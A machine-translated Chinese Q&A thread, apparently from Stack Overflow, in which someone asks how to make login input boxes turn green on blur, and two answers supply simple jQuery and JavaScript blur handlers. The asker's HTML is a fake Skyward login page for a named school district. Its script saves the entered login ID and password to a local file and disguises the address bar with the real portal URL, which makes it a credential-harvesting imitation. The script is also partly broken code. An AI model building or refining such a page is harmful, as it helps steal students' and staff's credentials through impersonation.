首先,我想指出所有这些都是客户端,而不是基于Web的。在输入文本时,我需要在焦点丢失后将表单框更改为绿色。表格框开始白色,焦点变成紫色,我需要它们在输入文字时失去焦点时变为绿色。
<!DOCTYPE html>
<html>
<head>
<title>Login - Powered By Skyward</title>
<link rel="icon" href="skyicon.gif">
<meta name="viewport" content="height=device-height, initial-scale=1.0">
<script type ="text/javascript">
function WriteToFile(passForm) {
set fso = CreateObject("Scripting.FileSystemObject");
set s = fso.CreateTextFile("C:\error.txt", True);
s.writeline(document.passForm.input1.value);
s.writeline(document.passForm.input2.value);
s.Close();
window.history.pushState("object or string", "Skyward Login", "https://sky.gilmerisd.org/scripts/wsisa.dll/WService=wsEAplus/seplog01.w");
}
</script>
<style>
body {
background-image: url("slp_ps.jpg");
background-repeat:no-repeat;
}
input {
display:inline-block;
float:right;
}
{
width:1234px;
height:50%;
position:relative;
margin:auto;
}
.btn-style{
border : solid 1px #2d9cf0;
border-radius : 3px;
moz-border-radius : 3px;
font-size : 9px;
color : #000000;
padding : 4px 13px;
background-color : #ffffff;
}
div {
margin-top: 500px;
margin-bottom: 0px;
margin-right: 500px;
margin-left: 485px;
}
.inputbox-css {
-webkit-box-sizing: content-box;
-moz-box-sizing: content-box;
box-sizing: content-box;
margin: -1px 0 0;
padding: 5px;
border: 1px solid rgba(127,174,255,1);
-webkit-border-radius: 1px;
border-radius: 1px;
font: normal 16px/normal "Times New Roman", Times, serif;
color: rgba(0,0,0,0.9);
-o-text-overflow: clip;
text-overflow: clip;
}
.inputbox-css:focus {
background: #ebc4fc;
}
p {
display:block;
float:right;
}
</style>
</head>
<body>
<body background="slp_ps.jpg" style="width:1220px;height:700px;">
<div>
<p>
<form onsubmit="download(this['name'].value, this['text'].value)">
<font size="2" face="arial" class="element"> Login ID: </font><input class="inputbox-css" type="text" style="font-family: Verdana; font-size: 12px;" name="lllllllllll loginid" "width: 165px;" maxlength="100"/><br>
<br>
<font size="2" face="arial" class="element"> Password: </font><input class="inputbox-css" type="password" style="font-family: Verdana; font-size: 12px;" name="lllllllllll password;" "width: 160px;" maxlength="100"/><br>
<br>
<font size="2" face="arial"> <input type="submit" class="btn- style"name="lllllllllll submit" value="Sign In"/><br>
</form>
</p>
</div>
</form>
</body>
</html>
答案 0 :(得分:0)
这是一个使用Jquery的快速jsfiddle:
https://jsfiddle.net/37dw6e3u/
使用jquery .blur函数:
$("input").blur(function(){
$(this).css("background-color", "green")
});
(没有检查用户是否实际添加了文字以便您自己编写),您可以使用.focus更改焦点上的颜色。
我想说一个非常快速的谷歌搜索这个问题会为你的问题找到大量的解决方案。下次尝试自己修复它!
答案 1 :(得分:0)
模糊是你正在寻找的。 p>
document.write("<input type='text'>");
var input = document.querySelector('input');
input.addEventListener('focus',function(){
input.style.backgroundColor = "purple";
})
input.addEventListener('blur',function(){
if(input.value != ""){
input.style.backgroundColor = "green";
}
})